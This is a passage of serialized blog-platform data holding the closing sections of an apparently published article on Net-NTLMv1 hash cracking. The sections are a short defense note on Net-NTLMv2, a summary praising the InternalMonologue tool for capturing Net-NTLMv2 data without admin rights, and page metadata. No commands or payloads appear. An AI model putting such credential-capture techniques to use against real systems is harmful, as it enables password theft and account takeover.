src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016749250_8_ca4b94bfdd-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016750820_9_2ffbf0a20f-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Strategy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Since Windows Vista, Microsoft has defaulted to using the Net-NTLMv2 protocol. To downgrade to Net-NTLMv1, administrator privileges on the current system are first required.\u003C\u002Fp>\u003Cp>For the Net-NTLMv2 protocol, even if communication packets are captured, only dictionary attacks or brute-force cracking can be attempted, with a relatively low probability of success.\u003C\u002Fp>\u003Cp>In summary, since Windows Vista, the default Net-NTLMv2 protocol provides sufficient security assurance.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the encryption methods and cracking approaches of Net-NTLMv1, analyzes and tests the tool InternalMonologue, which can obtain Net-NTLMv2 data under regular user permissions—a highly impressive feature.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",50,"Onedaysec",5,"published","2026-02-02T07:25:19.686Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Net-NTLMv1 Password Hash: Encryption, Cracking & Exploitation Guide","Net-NTLMv1, Windows security, password hash, NTLM authentication, hash cracking, hashcat, network security, penetration testing",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],1172,1171,1170,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.130Z","2026-07-23T16:02:38.523Z","draft","2026-07-23T16:17:09.417Z","2026-07-23T16:17:09.416Z"]